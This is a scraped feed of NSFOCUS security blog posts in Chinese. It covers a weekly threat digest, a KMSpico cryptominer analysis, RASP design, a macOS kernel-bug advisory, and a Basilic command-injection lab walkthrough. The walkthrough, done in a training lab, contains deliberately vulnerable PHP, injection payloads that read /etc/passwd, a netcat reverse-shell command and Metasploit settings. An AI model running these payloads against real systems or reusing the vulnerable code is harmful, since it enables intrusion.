绿盟科技网络安全威胁周报——2017年51周

January 1, 2018, 7:07 pm

≫ Next: 大话态势感知1：态势感知“神经中枢”ESB企业数据总线

≪ Previous: 恶意样本分析手册–溯源篇

绿盟科技网络安全威胁周报及月报系列，旨在简单而快速有效的传递安全威胁态势，呈现重点安全漏洞、安全事件、安全技术。获取最新的威胁月报，请访问绿盟科技博客 http://blog.nsfocus.net/

一. 互联网安全威胁态势

1.1 CVE统计

最近一周CVE公告总数与前期相比。值得关注的高危漏洞如下：

1.2 威胁信息回顾

标题：Skyrocketing Bitcoin Fees Hit Carders in Wallet
- 时间：2017-12-26
- 摘要：Critics of unregulated virtual currencies like Bitcoin have long argued that the core utility of these payment systems lies in facilitating illicit commerce, such as buying drugs or stolen credit cards and identities. But recent spikes in the price of Bitcoin — and the fees associated with moving funds into and out of it — have conspired to make Bitcoin a less useful and desirable payment method for many crooks engaged in these activities.
- 链接：https://krebsonsecurity.com/2017/12/skyrocketing-bitcoin-fees-hit-carders-in-wallet/
标题：The Twitter account of the popular security expert John McAfee was hacked
- 时间：2017-12-28
- 摘要：The official Twitter account of popular cyber security expert John McAfee was hacked today, hackers used it to promote alternative cryptocurrencies.
- 链接：http://securityaffairs.co/wordpress/67183/hacking/john-mcafee-twitter-hacked.html
标题：黑客攻击Magento商务网站先窃取用户支付数据再自荐求职
- 时间：2017-12-29
- 摘要：采用常用帮助台扩展Mirasvit Helpdesk的Magento商务网站，遭受了一系列网络攻击。由于运营者没有及时更新补丁，攻击者利用影响Mirasvit Helpdesk 1.5.2及之前所有版本的漏洞进入后，留下恶意软件拦截客户支付数据，并将数据发往他地。
- 链接：http://toutiao.secjia.com/magento-website-attacked
标题：ImageMagick今年第四次爆DoS漏洞CVE-2017-17914
- 时间：2017-12-28
- 摘要：ImageMagick再爆 DoS漏洞，CVEID为CVE-2017-17914，问题出在coders/png.c模块中的功能函数 ReadOnePNGImage ，攻击者可以通过一个精心构造的mng图像文件引发DoS攻击，受影响版本 ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22。
- 链接：http://toutiao.secjia.com/imagemagick-dos-cve-2017-17914
标题：广州市公安签发第一张微信身份证明年1月向全国推广
- 时间：2017-12-27
- 摘要：微信身份证？这靠谱吗？它对于未来网络多重身份验证又会有怎样的影响，又对身份联网lol 有怎样的影响？facebook、谷歌和微软都在云中有自己的身份, 并且已经为身份控制做出了诸多努力, 但IoI必须发展成为一个合作的生态系统。
- 链接：http://toutiao.secjia.com/weixin-ctid
标题：Alteryx1.23亿美国公民数据泄露之前新注册一个亚马逊AWS账号就可以拿到
- 时间：2017-12-26
- 摘要：一家营销分析公司Alteryx 在网上留下了一个不安全的数据库，泄露了大约1.23亿美国家庭的敏感信息，这些美国公民个人信息包括街道地址、人口统计和家庭财务状况，以及有关房屋和汽车所有权的信息，甚至包括儿童。这个数据库对任何拥有亚马逊账户Web服务（Alteryx存储服务用于托管这些文件）都是开放的。
- 链接：http://toutiao.secjia.com/alteryx-data-breach
标题：日产加拿大金融公司110万客户数据泄露但否认客户付款信息泄露
- 时间：2017-12-25
- 摘要：2017年12月11日，身份不明的第三方入侵了日产加拿大金融公司，大量客户敏感信息发生数据泄露，据称泄露数据包括客户姓名、地址、车辆制造商和型号、车辆识别码、信用分数、贷款金额和每月付款金额。
- 链接：http://toutiao.secjia.com/nissan-databreach
标题：DDoS即服务PoodleCorp组织成员被捕因PoodleStresser服务数据泄露
- 时间：2017-12-25
- 摘要：臭名昭着的 Lizard Squad 和 PoodleCorp 黑客组织的成员本周承认，他运行了 DDoS即服务平台PoodleStresser服务，他和其他人曾经对全球的目标发动 DDoS攻击，而攻击行为激怒了其它黑客，PoodleStresser服务被他人攻陷之后泄露了大量数据，最终让执法机构掌握了证据。
- 链接：http://toutiao.secjia.com/poodlecorp-hacker-arrested
标题：CEO of Major UK-Based Cryptocurrency Exchange Kidnapped in Ukraine
- 时间：2017-12-27
- 摘要：Pavel Lerner, a prominent Russian blockchain expert and known managing director of one of the major crypto-exchanges EXMO, has allegedly been kidnapped by “unknown” criminals in the Ukranian capital of Kiev.
- 链接：https://thehackernews.com/2017/12/crypto-exchange-kidnap.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29

（数据来源：绿盟科技威胁情报与网络安全实验室收集整理）

二. 漏洞研究

2.1 焦点漏洞

焦点漏洞
- Linksys WVBR0-25远程命令注入漏洞
- NSFOCUS ID
  - 38446
- CVE ID
  - CVE-2017-17411
- 受影响版本
  - Linksys WVBR0-25
- 漏洞点评
  - Linksys是知名的宽带与无线路由器生产厂商。Linksys WVBR0-25在实现上存在远程命令注入漏洞，成功利用后可使攻击者在受影响设备上下文中执行任意命令。目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载更新。

（数据来源：绿盟科技安全研究部&产品规则组）

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/nsfocus-2017-51/

Tags: 安全周报, 绿盟科技, 网络安全周报

↧

大话态势感知1：态势感知“神经中枢”ESB企业数据总线

January 2, 2018, 7:02 pm

≫ Next: 电脑运行慢？原来是帮黑客免费挖矿

≪ Previous: 绿盟科技网络安全威胁周报——2017年51周

讲态势感知，主要来自军事领域，战场态势感知。实际上是一个体系。下图是导弹防御态势感知体系的例子，从这个图上，我们看到，为了拦截战略导弹，需要构建反导态势感知体系。

这个体系包括，轨道侦查卫星，预警飞机，远程警戒雷达，海上宙斯盾，甚至萨德。这些都是很牛逼的态势感知技术手段传感器，每个传感器都有独立处理模块，比如轨道侦查卫星经常用到大数据机器学习（NASA最强的部门就是EOS小组，地球观测小组，被黑客入侵后没法就动用这个小组，终于搞定了，这个事情作为全美的best practice最佳实践。）但是各个传感器发出的数据各有各的格式，我们互相没法说话。这哪成，于是美国搞了一个著名的C4I数据总线，于是态势感知用数据总线互相说话。(C4I系统是指指挥、控制、通讯、电脑和情报的集成，它以计算机为核心，综合运用各种信息技术，对军队和武器进行指挥与控制)。这个体系后来发展，变成C4ISR数据总线(即指挥Command、控制Control、通信 Communication、计算机computer、情报Intelligence、监视Surveillance、侦察Reconnaissance。)，于是，我们看到各个传感器在数据总线统筹下，共同决策，智能判定导弹落点，给出最佳的拦截点和应对手段（卫星激光，海基的宙斯盾反导，萨德，爱国者末端反导）。

态势感知最难的事情就是整合

实际上态势感知最难的活是什么？是数据总线的关键数据融合。我们经常听说飞机的态势感知怎么怎么样，从一堆的落后仪表，到现在的F35，歼20各种可以交互信息化大屏，飞行员头盔瞄准具，“光电跟踪系统EOTS”，总之飞机最核心的理念就是把飞机相控阵雷达，各种速度传感器，警戒雷达，GPS数据最直观的显示出来，飞机借助先机的态势感知能力，感知当前的状态，选择最佳的攻击防御手段。我们也听说F35因为软件问题，现在前200架没有战斗力。因为各种先进传感器没有整合完成，也就是没有完整的态势感知能力。预计具有全面战斗能力的第一个版本是Block 3F版本。该版本尚未完成，预计2018年才开始实战。五角大楼的测试办事处一再表示，任何飞行2B型F-35型飞机的飞行员，如果发现自己处于战斗状态，将“需要避免参与威胁，并需要其他友邻部队来救兵”。（F35迎来最大丑闻，花费四百亿近200架战机全部等着报废http://www.sohu.com/a/198740513_701549）。

伊尔76座舱

F35座舱

传说的歼20座舱

更奇葩的是欧洲双风，大名鼎鼎的台风战斗机，集成了英国的罗罗发动机，德国制造，总之各种牛逼，各种先进，但是在瑞士空军选型测试一下，吓了一跳，2个屏幕显示不同的目标数据，真假不分非常考究飞行员的脑子。结果综合性能还不如法国的阵风，虽然阵风号称样样落后，最差的发动机。（来源《台风阵风鹰狮欧洲三头鸭子谁最牛-官方评测，阵风横扫，欧洲无敌（http://www.sohu.com/a/211278746_99973322）

整合信息的关键在于后台体系建设

这可能颠覆我们的认知，以前陆海空3军指挥体系都不兼容，3军联合演习，空军飞的快，海军跑的慢，结果空军到了地点，找不到船，油又少，只能飞走了。演习失败了。美军搞了总参谋部来统一协调，搞了几大战区司令部，习大大上来搞了战区制，战区内统一指挥。仅仅在建设方面才陆海空自己建设。因此，打破了部门割裂，战斗力大增，而作为中国版本的C4ISR也是战区指挥-战场态势感知的核心。（题外话，中国这几年军事建设的重点在“补空白，强体系”，通过大量的实战攻防演练来锻炼队伍，寻找差距。实际上这个在网络空间安全也适用，美国总统特朗普2017年7月18日宣布美军网络司令部升级，以提升美国网络行动和国防水平。网络司令部升级后将成为美军第十个联合作战司令部，地位与美国中央司令部等主要作战司令部持平。）

整合信息的技术关键在于ESB数据总线

说了半天的废话，态势感知核心是C4ISR总线，当然软件中我们经常称之为ESB数据总线，实际上很多年前我们就在研究，研究元数据管理与CWM标准（运营商搞得比较早，主要是处理不同厂家语音数据交互和监控），技术这几年发展，发现大数据是最好的ESB技术。其中最重要的就是大数据流式处理和大数据仓库。传统ESB通过上下层分离技术。将传感器传回的日志统一存储，上层可以开发各种app。比如在绿盟的架构中，就是spark作为核心，上层通过SPARK STREAMING技术流式处理，将各种传感器传回的日志范式化，统一存储处理（符合一般意义上数据层融合）。在数据总线中，涉及元数据的部分，绿盟定义一个良好的规范。从而有效的处理来自各种日志，包括流量日志，攻击日志，样本日志，漏洞日志。上层开发的态势感知，追踪溯源，情报互联等APP模块。

为了更好做数据融合，绿盟ESB利用分布式流式处理技术，引入了态势感知理解引擎和态势感知推理决策引擎。态势感知理解引擎主要作用是做数据融合。各种先进传感器的各种日志，经过理解后变成统一的元事件，完成特征层融合。（特征层融合属于中间层次的融合，它先对来自传感器的原始信息进行特征提取(特征可以是目标的边缘、方向、速度等)，然后对特征信息进行综合分析和处理。特征层融合的优点在于实现了可观的信息压缩，有利于实时处理，并且由于所提取的特征直接与决策分析有关，因而融合结果能最大限度的给出决策分析所需要的特征信息。特征层融合一般采用分布式或集中式的融合体系。特征层融合可分为两大类:一类是目标状态融合;另一类是目标特性融合。引自百度百科）。

态势感知理解引擎作为一个核心引擎，作为态势感知的ESB数据总线的核心，他可以从情报平台下载情报，又可以处理多源日志，形成归一化的可信安全事件。当然最重要他提供了态势感知最核心能力之一的Ad-Hoc能力（后面撰文）。

图：特征层数据融合结果，从很多日志中理解成为扫描事件

有很多人说态势感知、机器学习、UEBA多么牛逼，实际上机器学习、UEBA仅仅是态势感知的一个技术，一个先进引擎，而态势感知的难点在于他的神经网络，他的数据总线，简单来说，攻击链技术就是近几年最流行的网络空间态势感知特征层融合技术，美国基于攻击链技术构建了威胁情报体系，这样，CIA,FBI各个单位传来的安全威胁事件，就能在同一个语言说话（后续专门讲情报）。美国著名的mitre公司，就是一个专门搞标准的公司。其中最重要的就是情报的数据融合。美国反恐情报全球做的最好。

以ESB数据总线形成神经中枢直联决策大脑

最后收一下，我们从2009年折腾态势感知，折腾了8年，不断整合积累并不断调整，目前通过理解引擎实现了DDOS事件，恶言代码僵木蠕事件，网络入侵事件，系统漏洞，系统配置等事件等特征层融合。这些特征层融合的原始日志来自不同的设备，比如远程登录事件来自NIDS，或者服务器日志。但是它们经过理解后形成共同的语言，送入ESB中，供上层分析使用，如送入推理决策引擎决策。

总结：

1、构建在多源传感器的日志的接收、存储、理解来搭建的态势感知ESB企业数据总线，是态势感知的“神经中枢”。

2、数据融合，尤其是特征层融合是态势感知的ESB最核心功能。

3、分布式消息队列，大数据分布式存储，分布式流式处理，高性能解析引擎，构建了态势感知ESB企业数据总线的主要技术手段。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/nssa-esb/

Tags: 态势感知, 绿盟科技

↧

电脑运行慢？原来是帮黑客免费挖矿

January 2, 2018, 10:05 pm

≫ Next: RSAP技术分析

≪ Previous: 大话态势感知1：态势感知“神经中枢”ESB企业数据总线

目前常用的Windows激活工具KMSpico被发现带有挖矿病毒“Trojan/Miner”, 在疑似KMSpico激活工具官网“http://kmspi.co”中下载该工具，电脑将被植入门罗矿工病毒“Trojan/Miner”，利用被入侵的电脑疯狂挖掘门罗币。

门罗矿工病毒通常作为一个木马软件进入系统。该恶意软件隐藏在电脑中，表现为电脑CPU、内存等占用高，风扇发热，电脑开始工作得比平时慢得多，这些额外的资源使用不仅会减慢你的电脑运行速度，影响用户电脑的正常运行，导致应用程序崩溃，甚至可能会因为过热而导致硬件损坏。

Step1 入侵检测：NIDS挖矿告警

12月15号，在某客户机房，运维人员在绿盟网络入侵检测系统NIDS上发现如下告警信息：

信息显示，源地址为“192.168.X.X”的主机，持续访问目的地址为“202.106.X.X”的外网主机，该行为命中NIDS 规则号为“41523”的规则。在NIDS上查询规则号为“41523”的入侵检测规则，显示该告警事件是一起“门罗币挖矿程序网络通信”。运维人员怀疑内网有中招门罗币挖矿程序的用户主机，在尝试连接矿池服务器 “pool.minexmr.com”。

Step2 威胁追踪：ESP威胁调查

进一步在绿盟企业安全平台ESP上调查发现，该客户内部主机10.70.X.X存在门罗币挖矿程序网络通信，该主机长时间多次尝试访问矿池服务器“pool.minexmr.com”域名地址。而在这之前，该主机用户刚刚下载并运行过KMSpico软件，希望破解其盗版Windows系统软件。

Step3 沙箱检测：TAC样本分析

在绿盟威胁分析系统TAC沙箱中，运行该KMSpico软件，分析显示该软件威胁等级为“高”。该软件加载释放的动态库存在威胁，沙箱显示“可能是恶意程序释放的模块程序”。同时，TAC给出的处理建议“建议安装主动防御软件来检测和防护”。

Step4 样本分析：绿盟专家分析

绿盟威胁情报与网络安全实验室专家对感染病毒的KMSpico软件做了进一步分析。KMSpico软件中有若干批处理工具，其中有一个批处理工具样本是win32.exe，如下图所示：

该样本是一个利用CPU资源进行挖矿的恶意程序，和通常运行在矿机上的挖矿程序不同，该样本通过把挖矿模块和木马行为模块进行组合得到了可以在后台静默挖矿并具备后门功能的恶意程序。受感染的机器将会时刻占满CPU资源进行挖矿任务的运算，在严重影响用户体验（表现为机器运行慢、卡）的同时，对CPU的损耗程度将会随着开机时间的增长而快速递增，严重影响CPU的使用寿命。

样本在执行后会利用系统进程来掩护挖矿模块的行为：通过以挂起方式创建进程，通过注入替换新进程空间中的代码再恢复执行，可以使新进程以原本的进程名执行完全不同的操作，这种注入方式通常被称作“傀儡进程”。在x86环境下，样本使用svchost.exe作为自己的傀儡进程；而在x64环境下，样本改用notpad.exe作为傀儡进程。同时，样本在后台检测傀儡进程的状态，一旦傀儡进程被人为结束，样本会再重新创建傀儡进程进行挖矿。

病毒弱点：样本创建傀儡进程时传入了有明显挖矿程序特征的参数，使用较为高级的进程管理工具可以明显地知道哪些进程有问题。

样本在进行挖矿行为时，会连接参数中的矿池域名“xmr.pool.minergate.com:45560”，并使用账号zcashminer@gmx.com进行登录，然后从矿池中接收挖矿任务id，并向矿池汇报运算结果。

病毒弱点：样本是恶意的，它连接的矿池却不是，这就意味着矿池并不会刻意加密或者混淆流量来保证传输的隐蔽性，所有的交互都是以json的格式进行解析，在网络流量中可以使用对应的键名、疑似jobid的hash值来对可疑的包进行溯源及拦截。

样本为了方便对所有的感染者进行统一的管理而设置了命令交互模块，通过在本机开启4048端口，样本可以接收并处理远程的攻击者下发的指令，来进行改变矿池地址、汇报挖矿进度等操作。

指令格式：GET /[command]|[param]\r\n

上例为通过简单指令summary使样本汇报自身信息。

病毒弱点：指令结构简单，容易识别和跟踪。其原理是在本机开启端口作为后门，这种方式不适用于对内网机器的控制。

绿盟下一代威胁防御解决方案

应用绿盟下一代威胁防御解决方案，能够实现对已知和未知威胁的纵深检测、协同防护、快速响应和安全闭环。

纵深检测

绿盟网络入侵检测系统NIDS产品本身具备国内领先的攻击规则特征库，能对已知安全威胁进行检测，而且具备持续更新的信誉特征库来降低未知恶意软件所带来的危害。绿盟威胁分析系统TAC沙箱，能够检测已知和零日攻击，抗逃避能力强，分析应用协议及文件类型全面、检测精确；多引擎集成，提供事件响应的优先排序。

协同防护、快速响应

NIDS可与TAC产品组成高级威胁软件防御方案，在该方案中，NIDS执行流量检测和未知威胁文件还原；其还原出的未知文件，提交给TAC进行分析。TAC对文件执行启发式病毒扫描、静态指令分析和动态行为分析，最终判断该未知文件是否恶意。TAC能够将提取的威胁情报和产生的告警信息实时反馈给NIDS设备， NIDS根据获得的动态情报对恶意软件传播进行在线快速拦截。

安全闭环

绿盟下一代威胁防御解决方案，能够在网络层、终端和云端形成威胁闭环，并使用大数据安全分析平台，实现管理闭环。在网络层，NIDS能够根据自身规则和TAC实时检测到的高级威胁信息，进行在线拦截闭环；在终端，NIDS能根据检测结果，及时将终端可疑信息推送到终端杀毒软件上，在主机上根除恶意威胁形成闭环；在云端，NIDS、TAC等绿盟本地安全产品，能够从绿盟威胁情报中心NTI周期下载最新情报到本地进行安全防护，也可将本地实时生成的情报反馈给云端，实现全网信息协同闭环。另外，绿盟企业安全平台ESP以大数据框架为基础，能够结合威胁情报系统，通过攻防场景模型的大数据分析及可视化展示等手段，协助客户建立和完善安全态势全面监控、安全威胁实时预警、安全事故紧急响应能力，实现安全管理闭环。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/bh-mining/

Tags: 挖矿, 绿盟科技, 黑客

↧

RSAP技术分析

January 3, 2018, 1:50 am

≫ Next: 【威胁通告】基于IOHIDFamily 0day漏洞的macOS内核攻击 “IOHIDeous”

≪ Previous: 电脑运行慢？原来是帮黑客免费挖矿

什么是RASP?RSAP和WAF性能比较怎么样？RSAP的实现思路是什么，都将在本文详细介绍

RASP概述

什么是RASP

RASP（Runtime application self-protection）运行时应用自我保护，

RSAP将自身注入到应用程序中，与应用程序融为一体，实时监测、阻断攻击，使程序自身拥有自保护的能力。并且应用程序无需在编码时进行任何的修改，只需进行简单的配置即可

Ø运行在应用程序内部；

Ø检测点位于应用程序的输入输出位置；

Ø输入点包括用户请求、文件输入等；

Ø输出点包括包括数据库、网络、文件系统等。

RASP能做什么

RASP vs WAF <部署>

WAF

Ø外部边界入口统一部署

Ø支持透明(串联)、旁路、反向代理三种方式

Ø容易形成单点故障，影响面大

RASP

Ø服务器上单独部署，嵌入在应用程序内部，应用代码无感知

java程序，启动时加上–javaagent rasp.jar参数即可

Ø开发语言强相关，但防护插件可共用

Ø更了解应用程序上下文

RASP vs WAF <性能>

WAF

Ø正则匹配的规则越多，性能越低

Ø和硬件规格相关

Ø业务报文多了一次socket转发，延迟大

Ø对服务器CPU没有影响

RASP

Ø由于只在关键点检测，不是所有请求都匹配所有规则

Ø某些厂商声称的对服务器CPU性能影响能够降低到2%

Ø非防护状态延迟增大3-5%，防护状态延迟增大4.6 – 8.9%

RASP vs WAF <产品特性>

RASP vs WAF <检测能力>

（来自https://www.oneasp.com/topic/raspwaf.html）

RASP前景

“The RASP market size is expected to grow from USD 294.7 million in 2017 to USD 1,240.1 million by 2022, at a Compound Annual Growth Rate (CAGR) of 33.3% during the forecast period. “

RASP技术实现(JAVA)

RASP实现思路

如何注入检测代码

在哪些访问控制点注入

注入之后如何检测攻击

检测到攻击后如何处理

RASP 注入方法(JAVA)

Servlet Filter: 在请求响应路径上，只能对http报文过滤处理

JVM重构: 植入JVM内部, 基于JVM的安全控制层实现RASP容器。需要对JVM非常熟悉，难度很大。国外waratek采用这种方法

Java Instrument: 最普遍的做法

Java基础: 源码、编译、运行

什么是Java Instrument

Java SE 5 的新特性，依赖于 JVMTI。

用来监测和协助运行在 JVM 上的程序，甚至能够替换和修改某些类的定义

–javaagent 参数指定Instrumentation功能的 jar 文件来运行程序:

java –javaagent:K:\java\MyAgent.jar app.HelloWorld

什么是JVMTI

Ø全名JVM Tool Interface，是JVM暴露出来的一些供用户扩展的本地编程接口集合。

Ø基于事件驱动的，JVM每执行到一定的逻辑就会主动调用一些事件的回调接口，这些接口可以供开发者扩展自己的逻辑。

Java Instrument原理

Intrument的实现方式

JDK反射

概念

Java在运行时识别对象和类的信息，有2种方式:

Ø传统的RTTI: 编译时确定某个class是否被JVM加载；

Ø反射机制: 在运行状态中，对于任意一个类(包括未加载的)，都能够知道这个类的所有属性和方法；对于任意一个对象，都能够调用它的任意一个方法和属性；

借助这种对类结构探知的”自审”能力和多态特性，充分发挥Java的灵活性。

使用

Java提供了一个叫做reflect的库，封装了Method,Constructor,field,Proxy,InvocationHandler 等类

功能

Ø在运行时判断任意一个对象所属的类。

Ø在运行时构造任意一个类的对象。

Ø在运行时判断任意一个类所具有的成员变量和方法。

Ø在运行时调用任意一个对象的方法

Ø生成动态代理

JDK反射 – 实例1

动态加载

JDK反射 – 实例2

动态代理

JDK反射 – 结论

动态代理虽然灵活性高，但仍然需要使用相关的类库，进行动态代理的配置，并融合到应用的源代码中，不是理想的解决方案。

没有找到合适的方法在不修改应用代码的前提下，对已有类进行代理

Javassist

概念

一个开源的分析、编辑和创建Java字节码的类库。

由东京工业大学的数学和计算机科学系的 Shigeru Chiba （千叶滋）所创建。它已加入了开放源代码JBoss 应用服务器项目，通过使用Javassist对字节码操作为JBoss实现动态”AOP”框架。

允许开发者自由的在一个已经编译好的类中添加新的方法，或者是修改已有的方法。

Java Instrumention的一种方式。

优点

简单，直接使用java编码的形式，而不需要了解虚拟机指令，就能动态改变类的结构，或者动态生成类。

使用

Javassist库，封装了ClassPool、CtClass、CtMethod等类;

Javassist – 实例1

动态构造类

Javassist – 实例2

Instrument

premain函数:

transform函数:

如果是期望修改的类，找到类中期望被注入的函数，在函数前后添加检测函数(下图只是示意)。

ASM

概念

一个JAVA字节码分析、创建和修改的开源应用框架。

允许开发者自由的在一个已经编译好的类中添加新的方法，或者是修改已有的方法。

Java Instrumention的一种方式。

优点

可以用JVM指令直接操作字节码，更灵活；

性能高；

功能更丰富；

使用

ASM库/工具 http://asm.ow2.org/

封装ClassReader、ClassVisitor与ClassWriter等很多功能丰富的类

需要了解jvm指令和class文件结构

ASM – 常用类

ASM – 类关系图

典型的静态代理模式：

ASM – 字节码解析流程

ASM – 实例1

动态构造类

ASM – 实例2

修改类

ASM – 利用Method的扩展类

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/rsap-tech/

Tags: RASP, WAF, 绿盟科技

↧

【威胁通告】基于IOHIDFamily 0day漏洞的macOS内核攻击 “IOHIDeous”

January 3, 2018, 5:20 pm

≫ Next: 命令注入ISO：Basilic 1.5.14利用

≪ Previous: RSAP技术分析

近日，安全研究者Siguza公布了一个基于IOHIDFamily 0day的macOS内核攻击。这是IOHIDFamily中的一个仅针对macOS系统的漏洞，可以导致内核的读/写（r/w），并且可以由任意非特权用户触发和利用。

综述

近日，安全研究者Siguza公布了一个基于IOHIDFamily 0day的macOS内核攻击。这是IOHIDFamily中的一个仅针对macOS系统的漏洞，可以导致内核的读/写（r/w），并且可以由任意非特权用户触发和利用。Siguza表示该漏洞已经存在了至少15年，甚至25年，但由于无法远程被利用并且触发后的效果非常明显，所以危害程度应该不高。目前Apple官方还没有做出相关回应。

受影响的版本

目前包括最新系统在内均受影响

解决方案

目前Apple官方还没有发布任何相关公告修复该漏洞,由于该漏洞无法远程被利用,危害程度有限，用户可以保持关注，在Apple官方做出回应后采取后续措施。

参考链接：

https://support.apple.com/zh-cn/HT201222

关于IOHIDFamily

IOHIDFamily是一个内核扩展，用于提供HID的抽象接口，例如，触摸屏，按钮，等。在用户区域中，有两种与IOHID家族相关的API：（1）用于写HID驱动程序的“公共”API; （2）用于事件处理的“私有”API。

声明

本安全公告仅用来描述可能存在的安全问题，绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告，必须保证此安全公告的完整性，包括版权声明等全部内容。未经绿盟科技允许，不得任意修改或者增减此安全公告内容，不得以任何方式将其用于商业目的。

关于绿盟科技

北京神州绿盟信息安全科技股份有限公司（简称绿盟科技）成立于2000年4月，总部位于北京。在国内外设有30多个分支机构，为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户，提供具有核心竞争力的安全产品及解决方案，帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防研究，绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域，为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易，股票简称：绿盟科技，股票代码：300369。

绿盟科技官方微博二维码绿盟科技官方微信二维码

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/macos-iohideous/

Tags: macos, 威胁通告, 绿盟科技

↧

命令注入ISO：Basilic 1.5.14利用

January 4, 2018, 11:08 pm

≫ Next: DedeCMS最新版前台任意用户登录漏洞分析

≪ Previous: 【威胁通告】基于IOHIDFamily 0day漏洞的macOS内核攻击 “IOHIDeous”

命令注入是一种攻击，攻击者试图传递恶意载荷，这些载荷会被应用程序不当处理并在系统shell里执行。此漏洞会导致脆弱应用程序的宿主机上出现远程代码执行。

什么是命令注入？

命令注入以与应用程序相同的权限运行。比如，如果脆弱应用程序以www-data的权限运行，被利用后，攻击者会获取宿主机上所有的www-data权限。

命令注入漏洞存在的主要原因是缺乏输入验证，并且应用程序的编码中使用了系统调用或者系统方法。

让我们看一个易受攻击的代码示例：

下方是读取文件的代码。将其保存为“read.php”。创建一个“test.txt”文件，在文件中写入“Command Injection testing”，并保存。

<?php
print (“Command Injection testing”)
print(“<p>”);
$file=$_GET[‘fileread’];
system(“cat $file”);
?>

为读取文件，我们必须向服务器发送URL包含“fileread”的“GET”请求，如下：

http://localhost/read.php?fileread=abc.txt

输出将是：

Command Injection testing

Command injection text

为了利用上方代码中的命令注入漏洞，我们需要向服务器发送下方的请求：

http://localhost/read.php?fileread=abc.txt;id

输出将是：

Command Injection testing

Command injection text

Uid=33 (www-data) gid=33(www-data) groups=33(www-data)

攻击者执行该命令，权限与应用程序运行的权限相同。命令注入漏洞就是这么被利用的。

还有其他在脆弱应用程序中执行“id”的变种，如下：

http://localhost/read.php?fileread=abc.txt || id

http://localhost/read.php?fileread=abc.txt && id

如果安装的应用程序以根权限运行，那么命令注入可以在脆弱的宿主机上执行根用户能执行的任何命令。

命令注入渗透测试所需要的实验室设置：

Kali Linux (Bridged或NAT). 攻击者 Kali Linux 的IP是168.1.102。
命令注入ISO (Bridged或NAT)。目标IP是168.1.103。

了解命令注入ISO的外观和感受：

命令注入ISO给我们提供了登录操作系统并查看脆弱应用程序的机会。使用用户名“Securitytube”和密码“123321”登录命令注入ISO。

检查命令注入ISO（192.168.1.103）上的80端口。

如上所示，有很多可以利用的框架。在本文中，我们将利用Basilic 1.5.14.

什么是Basilic？

Basilic是在研究实验室中所用的书目服务器。它有助于在互联网上自动化和扩散研究出版物。它从出版物数据库中生成一个网页。这个框架还有助于显示索引、查找和其他各种功能。

Basilic要求正确安装和配置PHP、Apache和MySQL。

要下载、配置和安装Basilic，请点击下方链接：

http://artis.imag.fr/Software/Basilic/

现在，我们点击Basilic文件夹，你可以看到以下内容：

在互联网上搜索对应的利用方法，我们可以在下方URL找到CVE-2012-3399（描述了Basilic错误的输入验证）和一个任意代码执行利用方法：

http://www.securityfocus.com/bid/54234/exploit

该链接为我们提供了可导致远程代码攻击的脆弱URL。

该利用方法帮助我们确定“diff.php”文件容易受到输入处理的影响，并且出现在/basilica/Config目录下。

http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

SecurityFocus的输出编码似乎将其模糊化了。实际的利用方法如下：

http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2

使用上面提到的漏洞利用方法来执行命令。

我们可以使用file参数来执行系统命令。

我们来获得一个反向shell。

在Kali上启动一个监听器：

root@kali#nc -lvvp 3333

输入文件参数为“diff.php?file=|nc -v 127.0.0.1 3333 -e /bin/bash&new=1&old=2”的命令。

我们就得到了想要的shell。

在Metasplit和Kali的帮助下，我们来利用这个漏洞。

在Exploit-DB上利用Kali的SearchSploit工具搜索利用方法，我得到了一个Ruby利用方法。

如果编写语言是Ruby，那么我想它会出现在Metasploit中。

在MSF框架中查找利用方法。

root@kali# service postgresql start

root@kali# service metasploit start

root@kali# msfconsole

msf> search basilic

如上所示，我们找到了用于Basilic的任意命令执行利用方法。

按照下图所示，配置和运行Metasploit：

模块选项：

RHOST 192.168.1.103

RPORT 80

TARGETURL /basilic-1.5.14/

载荷选项：

LHOST 192.168.1.102

LPORT 4444

最后，利用方法。

我们成功地在Basilic里面利用了命令注入程序，并获取了目标的www-data权限。

如何防止命令注入

开发者应采用恰当的输入验证，并且不在整个应用程序中使用特殊字符。
不再后端编程的任何地方使用系统调用功能。
应用程序应该以最低权限运行。

文章翻译自：http://resources.infosecinstitute.com/pentester-academy-command-injection-iso-basilic-1-5-14-exploitation/

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/iso-basilic-1-5-14/

Tags: kali linux, 命令注入, 绿盟科技

↧

DedeCMS最新版前台任意用户登录漏洞分析

January 21, 2018, 6:50 pm

≫ Next: 绿盟科技网络安全威胁周报 201803

≪ Previous: 命令注入ISO：Basilic 1.5.14利用

DedeCMS最近又有一个缺陷被爆出来，可以绕过一些判断条件从而导致前台任意用户登录，配合上一个重置密码漏洞，可以达到从前台登录管理员账户并修改dede_admin表里的密码，也就是真正修改了管理员密码。下面来简单分析一下。

0x01 概述

前几天爆出的DedeCMS最新版(20180109)任意用户密码修改漏洞存在有一定局限性，一是只能影响没有设置密保问题的用户，二是不能重置管理员admin的密码，原因当时也说了，管理员信息存在另一个表dede_admin中，而且管理员默认不允许从前台登录，所以就算更改了dede_member里admin的密码也没法登录。但是最近又有一个缺陷被爆出来，可以绕过一些判断条件从而导致前台任意用户登录，配合上一个重置密码漏洞，可以达到从前台登录管理员账户并修改dede_admin表里的密码，也就是真正修改了管理员密码。

下面来简单分析一下

0x02 漏洞分析

